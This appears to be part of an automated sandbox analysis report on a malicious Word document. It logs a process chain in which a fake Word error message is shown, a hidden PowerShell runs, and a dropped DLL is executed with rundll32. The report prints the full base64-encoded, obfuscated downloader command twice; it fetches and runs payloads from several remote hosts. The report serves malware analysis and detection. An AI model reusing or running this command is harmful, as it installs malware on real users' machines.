                    MD5 hash:95C38D04597050285A18F66039EDB456
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:02:32:36
                    Start date:14/01/2021
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACgAJwAvAGMAagBzACcAKwAnAG8AJwApACsAKAAnAG0AbABvACcAKwAnAC4AegBpAHAAQAAnACkAKwAoACcAQQAnACsAJwBdAFsAcQAnACkAKwAnAFsAJwArACgAJwBEADoALwAnACsAJwAvACcAKQArACcAZQAtACcAKwAoACcAbQBhAGMAbwAnACsAJwBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC4AJwApACsAKAAnAGIAJwArACcAcgAvAGMAbAAzACcAKQArACcANQAnACsAKAAnAGUAMAAuAHoAaQBwACcAKwAnAEAAQQAnACsAJwBdAFsAJwApACsAJwBxAFsAJwArACgAJwBEACcAKwAnADoALwAnACkAKwAnAC8AbAAnACsAKAAnAGUAZwAnACsAJwBpACcAKwAnAG8AbgAuAHMAJwArACcAZQByACcAKwAnAGkAZQBzAG4AJwApACsAJwBvAHcAJwArACgAJwAuAHcAZQAnACsAJwBiACcAKQArACgAJwBzAGkAdAAnACsAJwBlACcAKQArACcALwBxACcAKwAoACcAMwAnACsAJwAzAHIAdgAnACkAKwAnADIAJwArACgAJwAuAHoAaQAnACsAJwBwACcAKQApAC4AIgByAGUAYABwAGwAYABBAEMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAJwArACcAZQB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAGkAdAAiACgAJABLADEANwBQACAAKwAgACQAUgB6AGUAOABtAHMAMQAgACsAIAAkAEoAMgA0AEwAKQA7ACQAUAA4ADkASgA9ACgAJwBHADIAJwArACcANQBQACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBoAGIAcgBjAGYAXwAgAGkAbgAgACQARwB0ADAAZQBzADEAdQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAdABlAG0ALgBuAEUAdAAuAHcARQBiAEMAbABpAEUATgBUACkALgAiAEQATwB3AGAATgBMAE8AQQBEAGYAaQBgAEwAZQAiACgAJABHAGgAYgByAGMAZgBfACwAIAAkAFUAbwA3AG8AbAB1AGUAKQA7ACQASwAxADgASwA9ACgAJwBKACcAKwAoACcANQBfACcAKwAnAFoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBvADcAbwBsAHUAZQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQANgAwADkANQApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABVAG8ANwBvAGwAdQBlACwAKAAoACcAUgAnACsAJwB1AG4ARAAnACkAKwAnAGwAbAAnACkALgAiAFQAYABPAHMAVAByAGkAYABOAGcAIgAoACkAOwAkAFoANgAyAEgAPQAoACgAJwBCACcAKwAnADcAOAAnACkAKwAnAFcAJwApADsAYgByAGUAYQBrADsAJABYADAANABMAD0AKAAoACcARQAnACsAJwAyADQAJwApACsAJwBBACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1ADEAUwA9ACgAJwBJACcAKwAoACcAMwAnACsAJwA5AE0AJwApACkA
                    Imagebase:0x49f30000
                    File size:345088 bytes
                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:02:32:36
                    Start date:14/01/2021
                    Path:C:\Windows\System32\msg.exe
                    Wow64 process (32bit):false
                    Commandline:msg user /v Word experienced an error trying to open the file.
                    Imagebase:0xff830000
                    File size:26112 bytes
                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:02:32:37
                    Start date:14/01/2021
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG8AcgBsAGQAbwBmAGoAYQBjACcAKwAnAG8AJwArACcAYgAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACgAJwAvAGMAagBzACcAKwAnAG8AJwApACsAKAAnAG0AbABvACcAKwAnAC4AegBpAHAAQAAnACkAKwAoACcAQQAnACsAJwBdAFsAcQAnACkAKwAnAFsAJwArACgAJwBEADoALwAnACsAJwAvACcAKQArACcAZQAtACcAKwAoACcAbQBhAGMAbwAnACsAJwBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC4AJwApACsAKAAnAGIAJwArACcAcgAvAGMAbAAzACcAKQArACcANQAnACsAKAAnAGUAMAAuAHoAaQBwACcAKwAnAEAAQQAnACsAJwBdAFsAJwApACsAJwBxAFsAJwArACgAJwBEACcAKwAnADoALwAnACkAKwAnAC8AbAAnACsAKAAnAGUAZwAnACsAJwBpACcAKwAnAG8AbgAuAHMAJwArACcAZQByACcAKwAnAGkAZQBzAG4AJwApACsAJwBvAHcAJwArACgAJwAuAHcAZQAnACsAJwBiACcAKQArACgAJwBzAGkAdAAnACsAJwBlACcAKQArACcALwBxACcAKwAoACcAMwAnACsAJwAzAHIAdgAnACkAKwAnADIAJwArACgAJwAuAHoAaQAnACsAJwBwACcAKQApAC4AIgByAGUAYABwAGwAYABBAEMARQAiACgAKAAoACcAQQBdACcAKwAnAFsAJwApACsAJwBxACcAKwAnAFsARAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAJwArACcAZQB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAdgB3ACcAKwAnAGUAJwApACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAGkAdAAiACgAJABLADEANwBQACAAKwAgACQAUgB6AGUAOABtAHMAMQAgACsAIAAkAEoAMgA0AEwAKQA7ACQAUAA4ADkASgA9ACgAJwBHADIAJwArACcANQBQACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBoAGIAcgBjAGYAXwAgAGkAbgAgACQARwB0ADAAZQBzADEAdQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwBZAFMAdABlAG0ALgBuAEUAdAAuAHcARQBiAEMAbABpAEUATgBUACkALgAiAEQATwB3AGAATgBMAE8AQQBEAGYAaQBgAEwAZQAiACgAJABHAGgAYgByAGMAZgBfACwAIAAkAFUAbwA3AG8AbAB1AGUAKQA7ACQASwAxADgASwA9ACgAJwBKACcAKwAoACcANQBfACcAKwAnAFoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBvADcAbwBsAHUAZQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADQANgAwADkANQApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABVAG8ANwBvAGwAdQBlACwAKAAoACcAUgAnACsAJwB1AG4ARAAnACkAKwAnAGwAbAAnACkALgAiAFQAYABPAHMAVAByAGkAYABOAGcAIgAoACkAOwAkAFoANgAyAEgAPQAoACgAJwBCACcAKwAnADcAOAAnACkAKwAnAFcAJwApADsAYgByAGUAYQBrADsAJABYADAANABMAD0AKAAoACcARQAnACsAJwAyADQAJwApACsAJwBBACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgA1ADEAUwA9ACgAJwBJACcAKwAoACcAMwAnACsAJwA5AE0AJwApACkA
                    Imagebase:0x13fa90000
                    File size:473600 bytes
                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    General

                    Start time:02:32:41
                    Start date:14/01/2021
                    Path:C:\Windows\System32\rundll32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
                    Imagebase:0xffb50000
                    File size:45568 bytes
                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:02:32:42
                    Start date:14/01/2021
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
                    Imagebase:0xcf0000
                    File size:44544 bytes
                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Disassembly

                    Code Analysis

                    Reset < >